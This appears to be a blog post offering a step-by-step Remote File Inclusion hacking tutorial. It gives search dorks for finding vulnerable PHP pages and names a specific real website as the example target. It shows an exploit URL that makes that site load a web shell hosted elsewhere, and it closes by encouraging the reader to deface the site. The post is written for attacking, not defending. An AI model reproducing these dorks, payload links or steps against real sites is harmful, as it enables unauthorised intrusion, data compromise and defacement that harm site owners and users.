RFI Hacking Tutorial



RFI ( Remote File Inclusion ) is a method of injecting the remote file link to the server and get the site access. By this vulnerability attacker can deface or compromise the data from the site.
* Before getting start ( Things required )
  • A shell uploaded in any webhosting try my3gb( dot )com ( Any shell you like )
  • Vulnerable site
  • A sharp brain ;)
Mostly Used Dorks for RFI :-
inurl:/modules/My_eGallery/public/displayCategory.php?basepath=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
How to Hack website using RFI method
After uploading the shell in the hosting get it’s link eg:- username.my3gb.com/shell_name.php . Now it’s for the Vulnerable site.
You can get them by Using dorks. I am using this site :- http://www.cbspk.com
Here’s the vulnerable the link of the site :- http://www.cbspk.com/v2/index.php?page=site link here.
now to check whether the site is vulnerable or not you have to put the any site link after ?page= for example :-
http://www.cbspk.com/v2/index.php?page=http://google.com
If it will open google.com in the same page then it’s vulnerable and if it didn’t then check any other site.
Now after getting the vulnerable site replace the http://google.com with your shell link. Now exploit link will be :-
http://www.cbspk.com/v2/index.php?page=http://username.my3gb.com/shell.php?
And add ? also to the link if the site is vulnerable it will embedded the page to the site.
After successfully execution. The only thing left is your creativity Defacing



CopyRights: Please Stop Stealing contents from our site i.e xedlgubaid.blogspot.com . I am working hard to create an article, you simply copying? Please respect our hard work. Atleast place backlink to our site & give credit to our blog/author. Hope you will understand our feelings.

Comments

Popular Posts